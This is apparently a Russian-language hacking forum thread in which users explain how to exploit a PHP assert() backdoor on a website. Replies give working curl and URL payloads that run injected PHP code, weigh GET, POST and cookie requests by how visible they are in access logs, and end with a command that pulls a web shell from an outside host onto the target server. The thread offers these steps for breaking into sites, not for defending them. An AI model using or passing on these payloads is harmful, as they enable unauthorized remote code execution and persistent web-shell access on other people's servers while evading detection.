Допустим в php файле на сайте есть строка вида:


PHP:
assert($_REQUEST[123123123);

Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).

Как можно написать PHP скрипт чтобы использовать данную уязвимость ?

Какой код лучше заливать?

marynli said:
↑ (https://antichat.live/posts/3977522/)
Допустим в php файле на сайте есть строка вида:

PHP:
assert($_REQUEST[123123123);

Как можно раскрутить это? С PHP плохо знаком, но шестое чувство подсказывает что он получает запрос на переменную 123123123 и выполняет PHP код (assert).
Как можно написать PHP скрипт чтобы использовать данную уязвимость ?
Какой код лучше заливать?


в параметр 123123123 пишешь пхп код, он выполняется

curl 'http://site.ru/' --data '123123123=phpinfo();'

site.com/yourfile.php?123123123=phpinfo();

strelok20094 said:
↑ (https://antichat.live/posts/3977593/)
site.com/yourfile.php?123123123=phpinfo();


get палевно

t0ma5 said:
↑ (https://antichat.live/posts/3977595/)
get палевно


а пост беспалевно? вот тебе выдерка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44

strelok20094 said:
↑ (https://antichat.live/posts/3977597/)
а пост беспалевно? вот тебе выдерка из access log
xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "POST /yourfile.php HTTP/1.1" 200 44


вот тебе выдержка из access log

xx.xx.xx.xxx - - [xx/Apr/xx:xx:xx:xx-0500] "GET /yourfile.php?123123123=phpinfo(); HTTP/1.1" 200 44

сам ответь что беспалевней

если уж на то пошло то я бы через куки слал

curl 'http://site.ru' -H 'Cookie: '123123123=phpinfo()'

А как запихать туда веб шелл?

marynli said:
↑ (https://antichat.live/posts/3979266/)
А как запихать туда веб шелл?




Code:
site.com/file.php?123123123=copy("http://mysite.com/shell.txt","shell.php");

зальётся по пути site.com/shell.php